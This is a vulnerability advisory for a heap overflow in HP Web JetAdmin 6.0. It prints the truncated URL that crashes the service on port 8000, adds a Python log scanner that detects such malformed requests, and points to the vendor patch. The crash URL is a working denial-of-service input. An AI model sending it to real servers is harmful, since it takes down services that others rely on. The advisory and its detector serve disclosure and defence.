COMMAND

    JetAdmin

SYSTEMS AFFECTED

    HP Web JetAdmin Version 6.0

PROBLEM

    UssrLabs found a heap memory overflow vulnerability in HP Web
    JetAdmin Version 6.0 (default port 8000).  Sending a malformed
    URL to port 8000 causes the process containing the services to
    stop responding.

    Affected software versions:

        HP Web JetAdmin Version 6.0 (Microsoft Windows 2000)
        HP Web JetAdmin Version 6.0 (Microsoft Windows NT 4.0)
        HP Web JetAdmin Version 6.0 (HP-UX 10.20)    (not tested)
        HP Web JetAdmin Version 6.0 (HP-UX 11.x)     (not tested)
        HP Web JetAdmin Version 6.0 (Linux - SuSE)   (not tested)
        HP Web JetAdmin Version 6.0 (Novell NetWare) (not tested)
        HP Web JetAdmin Version 6.0 (Red Hat Linux)  (not tested)
        HP Web JetAdmin Version 6.0 (Solaris)        (not tested)

    Example follows.  Original:

        http://ServerIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$__hpjwja_ack_ini)(_deviceList)&clearFilters=true&_refreshdevicelist=true&_special=new

    Malformed:

        http://ServerIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$
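
    A log check for the truncated request above, added here as an
    example (not part of the original advisory or of HP's software).
    It generalizes the one malformed URL to any devices_list.hts
    request whose obj parameter has unbalanced parentheses or a bare
    "$".  Assumptions: requests are recorded in Common Log Format by a
    proxy or sensor in front of port 8000; function names are
    hypothetical; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

SCRIPT_PATH = "/plugins/hpjwja/script/devices_list.hts"
# Common Log Format: client, ident, user, [time], "METHOD target PROTO"
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*"')

def obj_problems(target):
    """Return reasons the obj parameter of a devices_list.hts request looks truncated."""
    parts = urlsplit(target)
    if parts.path != SCRIPT_PATH:
        return []
    problems = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != "obj":
            continue
        depth = 0
        for ch in value:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth < 0:      # closing paren with no opener
                    break
        if depth != 0:
            problems.append("unbalanced parentheses")
        # "$" must introduce a name, as in $__hpjwja_ack_ini
        if re.search(r"\$(?![A-Za-z_])", value):
            problems.append("'$' with no variable name")
    return problems

def scan(lines):
    """Return (client, problems) for every log line carrying a malformed obj."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m and obj_problems(m.group(3)):
            hits.append((m.group(1), obj_problems(m.group(3))))
    return hits

# Constructed sample input (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$__hpjwja_ack_ini)(_deviceList)&clearFilters=true&_refreshdevicelist=true&_special=new HTTP/1.0" 200 5120',
    '192.0.2.66 - - [01/Jan/2000:10:00:05 +0000] "GET /plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$ HTTP/1.0" 502 0',
]

if __name__ == "__main__":
    for client, problems in scan(SAMPLE_LOG):
        print(client, "; ".join(problems))
```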

SOLUTION

    Obtain and install the latest release of Web JetAdmin 6.0, which
    is version 6.0.1233, from the following location:

        http://www.hp.com/cposupport/swindexes/hpwebjetad1880_swen.html